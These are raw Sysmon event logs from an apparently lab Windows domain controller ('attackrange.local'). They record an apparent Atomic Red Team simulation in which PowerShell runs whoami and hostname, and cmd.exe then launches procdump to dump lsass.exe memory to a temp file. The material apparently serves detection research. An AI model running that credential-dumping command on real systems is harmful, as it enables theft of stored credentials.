21:10:17.499{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A339-60D3-4F06-00000000CF01}6792C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9ca36d54(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beabb9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64) 154100x800000000000000025429Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.505{4DB9351A-A339-60D3-4F06-00000000CF01}6792C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000025428Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.484{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A339-60D3-4E06-00000000CF01}6692C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025427Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025426Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025425Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025424Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025423Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.484{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A339-60D3-4E06-00000000CF01}6692C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025422Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.484{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A339-60D3-4E06-00000000CF01}6692C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9ca36d54(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beabb9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64) 154100x800000000000000025421Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.491{4DB9351A-A339-60D3-4E06-00000000CF01}6692C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000025562Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.921{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=00187AD3217A48FC43A76F872F70B59B,SHA256=6AF4642C068B09C2D489C65954165D5E64EE01E5BED59561D412DD75ED621505,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025561Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.921{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=105930C7BBE437BABEF9A72B4D7E1957,SHA256=71700865071BECB932832A63343FE3E27074EBF3450401FE13CBAE1479DFDB62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025560Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.781{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A33A-60D3-5506-00000000CF01}3692C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025559Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.766{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A33A-60D3-5506-00000000CF01}3692C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025558Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.766{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025557Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.766{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025556Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.766{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025555Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.766{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025554Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.749{4DB9351A-A33A-60D3-5406-00000000CF01}6966740C:\Windows\system32\cmd.exe{4DB9351A-A33A-60D3-5506-00000000CF01}3692C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000025553Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.757{4DB9351A-A33A-60D3-5506-00000000CF01}3692C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe10.0Sysinternals process dump utilityProcDumpSysinternals - www.sysinternals.comprocdumpC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=D3763FFBFAF30BCFD866B8ED0324E7A3,SHA256=916CC8D6BF2282AE0D2DB587F4F96780AF59E685A1F1A511E0B2B276669DC802,IMPHASH=83B075100F8ECC5BF8446EDDD8E9CD6E{4DB9351A-A33A-60D3-5406-00000000CF01}696C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp" 10341000x800000000000000025552Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.749{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A33A-60D3-5406-00000000CF01}696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025551Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.718{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A33A-60D3-5406-00000000CF01}696C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025550Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.718{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025549Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.718{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025548Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.718{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.d